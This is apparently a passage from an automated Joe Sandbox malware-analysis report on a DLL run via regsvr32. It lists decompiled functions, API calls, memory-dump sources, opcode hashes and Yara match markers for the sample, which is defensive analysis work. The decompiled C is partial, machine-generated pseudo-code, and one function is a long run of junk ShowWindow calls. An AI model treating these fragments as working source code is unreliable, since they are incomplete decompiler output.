				E00000001180006CDC(_t17); // executed
				if (0 != 0) goto 0x800012a9;
				E00000001180002A58(0);
				goto 0x80001293;
				return 1;
			}

0x18000127c
0x18000127f
0x180001285
0x180001291
0x180001295
0x180001297
0x18000129e
0x1800012a2
0x1800012a7
0x1800012b0

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000000018000128A

Part of subcall function 0000000180002A08: __vcrt_initialize_locks.LIBVCRUNTIME ref: 0000000180002A0C

Memory Dump Source

Source File: 00000003.00000002.394508478.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.394503670.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394525690.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394535183.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394540062.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: __scrt_dllmain_crt_thread_attach__vcrt_initialize_locks
String ID:
API String ID: 108617051-0
Opcode ID: b3a5aff99e9bbd50fc4b4caf8482eddb7f62de2f1dfabb963a32cf9525c58297
Instruction ID: 3927130d99c38a55cbe47f9f4b507d4a3e007974ffcd633e9ac0bb37393e6b58
Opcode Fuzzy Hash: b3a5aff99e9bbd50fc4b4caf8482eddb7f62de2f1dfabb963a32cf9525c58297
Instruction Fuzzy Hash: 66E01A30B0528C8EFEE7E6B525423F937501B1E3C2F40D068B892825838D0947AD5722

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180010A8E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32 ref: 0000000180010A93

Part of subcall function 0000000180014C90: LoadStringW.USER32 ref: 0000000180014CBF
Part of subcall function 0000000180014C90: LoadStringW.USER32 ref: 0000000180014CDC

Memory Dump Source

Source File: 00000003.00000002.394508478.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.394503670.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394525690.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394535183.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394540062.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: LoadString$ExitProcess
String ID:
API String ID: 80118013-0
Opcode ID: 4511720a80b85894ed9872a941f45ad7e5906891a0c13688ba3e14c3fa3ec101
Instruction ID: b62d2fb12763fda2a64a5ee64e5548852d899a580494aacca0011f8ebade0f7c
Opcode Fuzzy Hash: 4511720a80b85894ed9872a941f45ad7e5906891a0c13688ba3e14c3fa3ec101
Instruction Fuzzy Hash: E1D0C936625A4892E7A29B61F80578A2390B78C7D4F809111A98C42A24CF2CC2098B00

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0000000180014555 Relevance: 216.5, APIs: 144, Instructions: 493COMMON

Download Yara Rule

APIs

ShowWindow.USER32 ref: 000000018001455C
GetLastError.KERNEL32 ref: 0000000180014566
ShowWindow.USER32 ref: 0000000180014570
GetLastError.KERNEL32 ref: 000000018001457A
ShowWindow.USER32 ref: 0000000180014584
GetLastError.KERNEL32 ref: 000000018001458E
ShowWindow.USER32 ref: 0000000180014598
GetLastError.KERNEL32 ref: 00000001800145A2
ShowWindow.USER32 ref: 00000001800145AC
GetLastError.KERNEL32 ref: 00000001800145B6
ShowWindow.USER32 ref: 00000001800145C0
GetLastError.KERNEL32 ref: 00000001800145CA
ShowWindow.USER32 ref: 00000001800145D4
GetLastError.KERNEL32 ref: 00000001800145DE
ShowWindow.USER32 ref: 00000001800145E8
GetLastError.KERNEL32 ref: 00000001800145F2
ShowWindow.USER32 ref: 00000001800145FC
GetLastError.KERNEL32 ref: 0000000180014606
ShowWindow.USER32 ref: 0000000180014610
GetLastError.KERNEL32 ref: 000000018001461A
ShowWindow.USER32 ref: 0000000180014624
GetLastError.KERNEL32 ref: 000000018001462E
ShowWindow.USER32 ref: 0000000180014638
GetLastError.KERNEL32 ref: 0000000180014642
ShowWindow.USER32 ref: 000000018001464C
GetLastError.KERNEL32 ref: 0000000180014656
ShowWindow.USER32 ref: 0000000180014660
GetLastError.KERNEL32 ref: 000000018001466A
ShowWindow.USER32 ref: 0000000180014674
GetLastError.KERNEL32 ref: 000000018001467E
ShowWindow.USER32 ref: 0000000180014688
GetLastError.KERNEL32 ref: 0000000180014692
ShowWindow.USER32 ref: 000000018001469C
GetLastError.KERNEL32 ref: 00000001800146A6
ShowWindow.USER32 ref: 00000001800146B0
GetLastError.KERNEL32 ref: 00000001800146BA
ShowWindow.USER32 ref: 00000001800146C4
GetLastError.KERNEL32 ref: 00000001800146CE
ShowWindow.USER32 ref: 00000001800146D8
GetLastError.KERNEL32 ref: 00000001800146E2
ShowWindow.USER32 ref: 00000001800146EC
GetLastError.KERNEL32 ref: 00000001800146F6
ShowWindow.USER32 ref: 0000000180014700
GetLastError.KERNEL32 ref: 000000018001470A
ShowWindow.USER32 ref: 0000000180014714
GetLastError.KERNEL32 ref: 000000018001471E
ShowWindow.USER32 ref: 0000000180014728
GetLastError.KERNEL32 ref: 0000000180014732
ShowWindow.USER32 ref: 000000018001473C
GetLastError.KERNEL32 ref: 0000000180014746
ShowWindow.USER32 ref: 0000000180014750
GetLastError.KERNEL32 ref: 000000018001475A
ShowWindow.USER32 ref: 0000000180014764
GetLastError.KERNEL32 ref: 000000018001476E
ShowWindow.USER32 ref: 0000000180014778
GetLastError.KERNEL32 ref: 0000000180014782
ShowWindow.USER32 ref: 000000018001478C
GetLastError.KERNEL32 ref: 0000000180014796
ShowWindow.USER32 ref: 00000001800147A0
GetLastError.KERNEL32 ref: 00000001800147AA
ShowWindow.USER32 ref: 00000001800147B4
GetLastError.KERNEL32 ref: 00000001800147BE
ShowWindow.USER32 ref: 00000001800147C8
GetLastError.KERNEL32 ref: 00000001800147D2
ShowWindow.USER32 ref: 00000001800147DC
GetLastError.KERNEL32 ref: 00000001800147E6
ShowWindow.USER32 ref: 00000001800147F0
GetLastError.KERNEL32 ref: 00000001800147FA
ShowWindow.USER32 ref: 0000000180014804
GetLastError.KERNEL32 ref: 000000018001480E
ShowWindow.USER32 ref: 0000000180014818
GetLastError.KERNEL32 ref: 0000000180014822
ShowWindow.USER32 ref: 000000018001482C
GetLastError.KERNEL32 ref: 0000000180014836
ShowWindow.USER32 ref: 0000000180014840
GetLastError.KERNEL32 ref: 000000018001484A
ShowWindow.USER32 ref: 0000000180014854
GetLastError.KERNEL32 ref: 000000018001485E
ShowWindow.USER32 ref: 0000000180014868
GetLastError.KERNEL32 ref: 0000000180014872
ShowWindow.USER32 ref: 000000018001487C
GetLastError.KERNEL32 ref: 0000000180014886
ShowWindow.USER32 ref: 0000000180014890
GetLastError.KERNEL32 ref: 000000018001489A
ShowWindow.USER32 ref: 00000001800148A4
GetLastError.KERNEL32 ref: 00000001800148AE
ShowWindow.USER32 ref: 00000001800148B8
GetLastError.KERNEL32 ref: 00000001800148C2
ShowWindow.USER32 ref: 00000001800148CC
GetLastError.KERNEL32 ref: 00000001800148D6
ShowWindow.USER32 ref: 00000001800148E0
GetLastError.KERNEL32 ref: 00000001800148EA
ShowWindow.USER32 ref: 00000001800148F4
GetLastError.KERNEL32 ref: 00000001800148FE
ShowWindow.USER32 ref: 0000000180014908
GetLastError.KERNEL32 ref: 0000000180014912
ShowWindow.USER32 ref: 000000018001491C
GetLastError.KERNEL32 ref: 0000000180014926
ShowWindow.USER32 ref: 0000000180014930
GetLastError.KERNEL32 ref: 000000018001493A
ShowWindow.USER32 ref: 0000000180014944
GetLastError.KERNEL32 ref: 000000018001494E
ShowWindow.USER32 ref: 0000000180014958
GetLastError.KERNEL32 ref: 0000000180014962
ShowWindow.USER32 ref: 000000018001496C
GetLastError.KERNEL32 ref: 0000000180014976
ShowWindow.USER32 ref: 0000000180014980
GetLastError.KERNEL32 ref: 000000018001498A
ShowWindow.USER32 ref: 0000000180014994
GetLastError.KERNEL32 ref: 000000018001499E
ShowWindow.USER32 ref: 00000001800149A8
GetLastError.KERNEL32 ref: 00000001800149B2
ShowWindow.USER32 ref: 00000001800149BC
GetLastError.KERNEL32 ref: 00000001800149C6
ShowWindow.USER32 ref: 00000001800149D0
GetLastError.KERNEL32 ref: 00000001800149DA
ShowWindow.USER32 ref: 00000001800149E4
GetLastError.KERNEL32 ref: 00000001800149EE
ShowWindow.USER32 ref: 00000001800149F8
GetLastError.KERNEL32 ref: 0000000180014A02
ShowWindow.USER32 ref: 0000000180014A0C
GetLastError.KERNEL32 ref: 0000000180014A16
ShowWindow.USER32 ref: 0000000180014A20
GetLastError.KERNEL32 ref: 0000000180014A2A
ShowWindow.USER32 ref: 0000000180014A34
GetLastError.KERNEL32 ref: 0000000180014A3E
ShowWindow.USER32 ref: 0000000180014A48
GetLastError.KERNEL32 ref: 0000000180014A52
ShowWindow.USER32 ref: 0000000180014A5C
GetLastError.KERNEL32 ref: 0000000180014A66
ShowWindow.USER32 ref: 0000000180014A70
GetLastError.KERNEL32 ref: 0000000180014A7A
ShowWindow.USER32 ref: 0000000180014A84
GetLastError.KERNEL32 ref: 0000000180014A8E
ShowWindow.USER32 ref: 0000000180014A98
GetLastError.KERNEL32 ref: 0000000180014AA2
ShowWindow.USER32 ref: 0000000180014AAC
GetLastError.KERNEL32 ref: 0000000180014AB6
ShowWindow.USER32 ref: 0000000180014AC0
GetLastError.KERNEL32 ref: 0000000180014ACA
ShowWindow.USER32 ref: 0000000180014AD4
GetLastError.KERNEL32 ref: 0000000180014ADE
ShowWindow.USER32 ref: 0000000180014AE8
GetLastError.KERNEL32 ref: 0000000180014AF2

Memory Dump Source

Source File: 00000003.00000002.394508478.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.394503670.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394525690.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394535183.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394540062.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: ErrorLastShowWindow
String ID:
API String ID: 3252650109-0
Opcode ID: 9a665b6fd1606399514c88e51871797ade4cb1dce934726ac272da09cbabfbb3
Instruction ID: 20d447c0f35bcb8e3c3c297cfd2fae4a36a0868fd259666119818285c186e9df
Opcode Fuzzy Hash: 9a665b6fd1606399514c88e51871797ade4cb1dce934726ac272da09cbabfbb3
Instruction Fuzzy Hash: B522B976B00E0986FBDB9F72AC1439B22A2AB8CBD5F46C439E40689174DE7DC75D8305

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001C48 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 0000000180001C64
RtlCaptureContext.NTDLL ref: 0000000180001C91
RtlLookupFunctionEntry.NTDLL ref: 0000000180001CAB
RtlVirtualUnwind.NTDLL ref: 0000000180001CEC
IsDebuggerPresent.KERNEL32 ref: 0000000180001D40
SetUnhandledExceptionFilter.KERNEL32 ref: 0000000180001D61
UnhandledExceptionFilter.KERNEL32 ref: 0000000180001D6C

Memory Dump Source

Source File: 00000003.00000002.394508478.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.394503670.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394525690.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394535183.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394540062.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1ffe1e744cccfe4686aba7d6a8aca853fc79a5f69e58afced9d2bc9442cc5b87
Instruction ID: 43a781f402e08a9585d1bfd569913690a5560a40171371ec2054230cf506bc92
Opcode Fuzzy Hash: 1ffe1e744cccfe4686aba7d6a8aca853fc79a5f69e58afced9d2bc9442cc5b87
Instruction Fuzzy Hash: 1931FB72605B848AEBA1DF60E8507EE7365F788785F44842AEB4E47A99DF38C74CC710

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800082EC Relevance: 9.1, APIs: 6, Instructions: 83
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E000000011800082EC(void* __ecx, intOrPtr __edx, long long __rbx, long long __rsi) {
				void* _t36;
				int _t38;
				signed long long _t60;
				long long _t63;
				_Unknown_base(*)()* _t82;
				void* _t86;
				void* _t87;
				void* _t89;
				signed long long _t90;
				struct _EXCEPTION_POINTERS* _t95;

				 *((long long*)(_t89 + 0x10)) = __rbx;
				 *((long long*)(_t89 + 0x18)) = __rsi;
				_t87 = _t89 - 0x4f0;
				_t90 = _t89 - 0x5f0;
				_t60 =  *0x80021010; // 0xc11a2227b184
				 *(_t87 + 0x4e0) = _t60 ^ _t90;
				if (__ecx == 0xffffffff) goto 0x8000832b;
				E00000001180001C40(_t36);
				r8d = 0x98;
				E00000001180002680();
				r8d = 0x4d0;
				E00000001180002680();
				 *((long long*)(_t90 + 0x48)) = _t90 + 0x70;
				_t63 = _t87 + 0x10;
				 *((long long*)(_t90 + 0x50)) = _t63;
				__imp__RtlCaptureContext();
				r8d = 0;
				__imp__RtlLookupFunctionEntry();
				if (_t63 == 0) goto 0x800083be;
				 *(_t90 + 0x38) =  *(_t90 + 0x38) & 0x00000000;
				 *((long long*)(_t90 + 0x30)) = _t90 + 0x58;
				 *((long long*)(_t90 + 0x28)) = _t90 + 0x60;
				 *((long long*)(_t90 + 0x20)) = _t87 + 0x10;
				__imp__RtlVirtualUnwind();
				 *((long long*)(_t87 + 0x108)) =  *((intOrPtr*)(_t87 + 0x508));
				 *((intOrPtr*)(_t90 + 0x70)) = __edx;
				 *((long long*)(_t87 + 0xa8)) = _t87 + 0x510;
				 *((long long*)(_t87 - 0x80)) =  *((intOrPtr*)(_t87 + 0x508));
				 *((intOrPtr*)(_t90 + 0x74)) = r8d;
				_t38 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(_t82, _t86);
				if (UnhandledExceptionFilter(_t95) != 0) goto 0x80008420;
				if (_t38 != 0) goto 0x80008420;
				if (__ecx == 0xffffffff) goto 0x80008420;
				return E000000011800010B0(E00000001180001C40(_t40), __ecx,  *(_t87 + 0x4e0) ^ _t90);
			}

0x1800082ec
0x1800082f1
0x1800082fa
0x180008302
0x180008309
0x180008313
0x180008324
0x180008326
0x180008332
0x180008338
0x180008343
0x180008349
0x180008353
0x18000835c
0x180008360
0x180008365
0x18000837a
0x18000837d
0x180008386
0x180008388
0x18000839b
0x1800083a8
0x1800083b1
0x1800083b8
0x1800083c5
0x1800083d7
0x1800083db
0x1800083e9
0x1800083ed
0x1800083f1
0x1800083fb
0x18000840e
0x180008412
0x180008417
0x180008446

APIs

RtlCaptureContext.NTDLL ref: 0000000180008365
RtlLookupFunctionEntry.NTDLL ref: 000000018000837D
RtlVirtualUnwind.NTDLL ref: 00000001800083B8
IsDebuggerPresent.KERNEL32 ref: 00000001800083F1
SetUnhandledExceptionFilter.KERNEL32 ref: 00000001800083FB
UnhandledExceptionFilter.KERNEL32 ref: 0000000180008406

Memory Dump Source

Source File: 00000003.00000002.394508478.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.394503670.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394525690.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394535183.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394540062.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: d0fc5085bf44c4937be082645d9f0fd030d92464e7166f1adeb9fe9a04ad5cc9
Instruction ID: d6e40695d6015e5c843dff92317e70983bbd332ebd8c23179410134a75d63e3d
Opcode Fuzzy Hash: d0fc5085bf44c4937be082645d9f0fd030d92464e7166f1adeb9fe9a04ad5cc9
Instruction Fuzzy Hash: 7E315032604F8486DBA1CF25E8407DE73A4F788798F544116FA9D43B59DF38C259CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0073F8C4 Relevance: 6.6, Strings: 5, Instructions: 393COMMON

Download Yara Rule

Strings

Wlw, xrefs: 0073FD4C
G]W2, xrefs: 0073FE0A
X2D7, xrefs: 0073F947
Uf, xrefs: 0073FDA2
n, xrefs: 0073FAEB

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: G]W2$Uf$Wlw$X2D7$n
API String ID: 0-182303197
Opcode ID: 5ce9af85c0101b92db01bf743a5277ddb3699d4210e4094ad3775c6a215530db
Instruction ID: 9984afed70627d21907dd1263aa047c6166e6b47c9f69a9bca82ffd6eda7c556
Opcode Fuzzy Hash: 5ce9af85c0101b92db01bf743a5277ddb3699d4210e4094ad3775c6a215530db
Instruction Fuzzy Hash: D4121770A04709EFDB58DF68C18A99EBBF1FF44344F40816DE84AAB250D775DA18CB85

Uniqueness

Uniqueness Score: -1.00%

Function 00745384 Relevance: 6.6, Strings: 5, Instructions: 313COMMON

Download Yara Rule

Strings

~~K, xrefs: 00745842
Bt$, xrefs: 00745461
Q|-, xrefs: 0074580C
M/uB, xrefs: 00745729
GK, xrefs: 00745653

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: GK$M/uB$Q|-$~~K$Bt$
API String ID: 0-557373213
Opcode ID: 5399f6d2f4ddd76430553fcbb3a69801bb23c4fdd32863c07da465c7968e24a8
Instruction ID: ecf3e3a59dc29732202d4f16f48361c2fe5869cf0ba5be7c0a6d11a15a0d2d43
Opcode Fuzzy Hash: 5399f6d2f4ddd76430553fcbb3a69801bb23c4fdd32863c07da465c7968e24a8
Instruction Fuzzy Hash: 9FE1027550160CCBDF68DF38C0994D93BE1FF58308F611229FC66A62A2DB78D914CB49

Uniqueness

Uniqueness Score: -1.00%

Function 00738378 Relevance: 6.5, Strings: 5, Instructions: 238COMMON

Download Yara Rule

Strings

w|, xrefs: 00738634
.I, xrefs: 00738439
i[, xrefs: 0073867B
{, xrefs: 00738649
gBfh, xrefs: 007383D0

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: .I$gBfh$i[$w|${
API String ID: 0-448909954
Opcode ID: fd252399347da21463b78aeaa0d34fc6630a10d5928b5024a52fe33a2729c415
Instruction ID: c4214fb8048abdf002e1a188c2d6409d538264dab7df93c915a10c7ec89c2e74
Opcode Fuzzy Hash: fd252399347da21463b78aeaa0d34fc6630a10d5928b5024a52fe33a2729c415
Instruction Fuzzy Hash: 96B13670D207499FDB88DFA9D8898DDBBF0FB48304F40921DE816AB251C778A945CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0074610C Relevance: 6.5, Strings: 5, Instructions: 208COMMON

Download Yara Rule

Strings

x, xrefs: 007463D0
Kn#, xrefs: 007461C9
zu, xrefs: 007461F7
vm, xrefs: 0074634F
cp, xrefs: 0074627B

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: cp$vm$x$zu$Kn#
API String ID: 0-3521309225
Opcode ID: 854233274bfaeff89ac29a935d156dc1944753dcbd55c44e864b2476cdfcfe8d
Instruction ID: 72927976356e983b2635bbee8661be541b779410aa818ab73a461cb71620afcc
Opcode Fuzzy Hash: 854233274bfaeff89ac29a935d156dc1944753dcbd55c44e864b2476cdfcfe8d
Instruction Fuzzy Hash: CFA103B0D143198FDB58CFA9D8898DEBBF0FB48314F108219E855B7290D3789945CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00747518 Relevance: 6.3, Strings: 5, Instructions: 87COMMON

Download Yara Rule

Strings

C;, xrefs: 007475B8
0T, xrefs: 007475D1
lXjD, xrefs: 00747598
#0FQ, xrefs: 007475F5
tS, xrefs: 00747639

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #0FQ$0T$C;$lXjD$tS
API String ID: 0-817034907
Opcode ID: e4bf78acd7a5f6a30f384b9d32d43fdeffbe4641104b903a1cc162fefd21facd
Instruction ID: abc6076ac56165a40d43ed5845e73bd6f5a4d9e38231b422d2b648600362f177
Opcode Fuzzy Hash: e4bf78acd7a5f6a30f384b9d32d43fdeffbe4641104b903a1cc162fefd21facd
Instruction Fuzzy Hash: C44192B180034E8FDB44DF64D88A4CE7FF0FB68398F215619E859A6250D3B89694CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 0073975C Relevance: 6.3, Strings: 5, Instructions: 77COMMON

Download Yara Rule

Strings

D-, xrefs: 0073984C
,, xrefs: 007397CB
3T, xrefs: 00739861
l, xrefs: 007397B1
Rc, xrefs: 00739782

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ,$3T$D-$Rc$l
API String ID: 0-617906138
Opcode ID: 3a3cf95294224deb7faeda9f3e638283c88744c906ce2ff68bf076d4943cea68
Instruction ID: 6d49e016ba36e6f6ff1730be1c34d74f2ab854c8dcd8869f83b43b012f4fab05
Opcode Fuzzy Hash: 3a3cf95294224deb7faeda9f3e638283c88744c906ce2ff68bf076d4943cea68
Instruction Fuzzy Hash: B641D5B081078E8FDB44CF64D88A4DE7BF0FB58358F104619E869A6260D3B89668CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001D98 Relevance: 6.0, APIs: 4, Instructions: 39
timethreadCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00000001180001D98(long long __rbx, long long _a32) {

				_a32 = __rbx;
			}

0x180001d98

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 0000000180001DC4
GetCurrentThreadId.KERNEL32 ref: 0000000180001DD2
GetCurrentProcessId.KERNEL32 ref: 0000000180001DDE
QueryPerformanceCounter.KERNEL32 ref: 0000000180001DEE

Memory Dump Source

Source File: 00000003.00000002.394508478.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.394503670.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394525690.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394535183.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394540062.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 435d845f9f5cdf73bfe4695b71b0048b28e79a424c4651dbd907605b843c4427
Instruction ID: 8b5b8807919832646eb0d744692d73e0514a3f66bd27872d13ad1b0d2e18aa1e
Opcode Fuzzy Hash: 435d845f9f5cdf73bfe4695b71b0048b28e79a424c4651dbd907605b843c4427
Instruction Fuzzy Hash: E6113C32600F449AEB52CF61EC943D833A4F31D799F041A25FAAD477A4DF78C2A88340

Uniqueness

Uniqueness Score: -1.00%

Function 0074CF70 Relevance: 5.4, Strings: 4, Instructions: 410COMMON

Download Yara Rule

Strings

#X, xrefs: 0074D3DB
UCV, xrefs: 0074D433
y4.), xrefs: 0074D445
, xrefs: 0074D0A7

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #X$ $UCV$y4.)
API String ID: 0-917551206
Opcode ID: 28325ea241be474c5b5558c29b1591e9c0afa6bd6a02919fad3fbb937fa4a7d1
Instruction ID: be0444f89f85d4aeeb64db146e1305562bc191515f28a4cc7ac981ab9fc919c4
Opcode Fuzzy Hash: 28325ea241be474c5b5558c29b1591e9c0afa6bd6a02919fad3fbb937fa4a7d1
Instruction Fuzzy Hash: 8512E4B1A0470D9FDB58DFA8E08A4DDBBF2FB48344F00412DE946A7290D7B9D819CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00734EB8 Relevance: 5.4, Strings: 4, Instructions: 386COMMON

Download Yara Rule

Strings

tL>, xrefs: 00735068
#X, xrefs: 0073521E
"., xrefs: 0073533A
rq%, xrefs: 007352CE

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #X$rq%$tL>$".
API String ID: 0-3922733902
Opcode ID: e7bca3236e2c6002a46b032ca93679f7d95ede6d4010d0837b1e0abab37f6438
Instruction ID: 0c9e683c7d2b6fa3a9a7d776b2486a085bebdd9bfd2396ebf6708486ae6fe575
Opcode Fuzzy Hash: e7bca3236e2c6002a46b032ca93679f7d95ede6d4010d0837b1e0abab37f6438
Instruction Fuzzy Hash: E122CF719097C88BDBF8DF24C8896DD37F0FF48344F90125A984E9A694DBB86684CF42

Uniqueness

Uniqueness Score: -1.00%

Function 0074AD28 Relevance: 5.2, Strings: 4, Instructions: 205COMMON

Download Yara Rule

Strings

Vc, xrefs: 0074AE8C
HE, xrefs: 0074AFE0
-, xrefs: 0074AE56
g, xrefs: 0074AE44

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: g$-$HE$Vc
API String ID: 0-2562162751
Opcode ID: f3d5559af2bde6194e80210adddbbaf8e95cb0bc6a16661ffa1dd3a57d8e1344
Instruction ID: 271b9e8b3a9d91f8c300b8da7f6817549a3ef6c49e066abf463dbb53c9312d71
Opcode Fuzzy Hash: f3d5559af2bde6194e80210adddbbaf8e95cb0bc6a16661ffa1dd3a57d8e1344
Instruction Fuzzy Hash: ADA1D1B150478C9FDB88CF28D88A4CD3BB2FB58398F505219FC4A97260D7B8D985CB85

Uniqueness

Uniqueness Score: -1.00%

Function 007380CC Relevance: 5.2, Strings: 4, Instructions: 163COMMON

Download Yara Rule

Strings

*i, xrefs: 007380E7
*%, xrefs: 00738281
(;, xrefs: 007382E2
he, xrefs: 0073814E

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: (;$*i$he$*%
API String ID: 0-35414758
Opcode ID: 8b9c9bfbfb1498278ba2aeeef8e78c7341b02e7a1b6eacef6973ad54d80d413a
Instruction ID: ca7afd2796b854a03b4d4f13d9afec1787b4fa95774ca1f5cbfe4df767fcd640
Opcode Fuzzy Hash: 8b9c9bfbfb1498278ba2aeeef8e78c7341b02e7a1b6eacef6973ad54d80d413a
Instruction Fuzzy Hash: AC711A70514748DBEF88CF28C8895DD3BA1FB48358F565319FC4AA6290D778D484CB89

Uniqueness

Uniqueness Score: -1.00%

Function 0073D474 Relevance: 5.1, Strings: 4, Instructions: 136COMMON

Download Yara Rule

Strings

(, xrefs: 0073D533
I, xrefs: 0073D66B
Yu, xrefs: 0073D5D1
*/, xrefs: 0073D623

Memory Dump Source

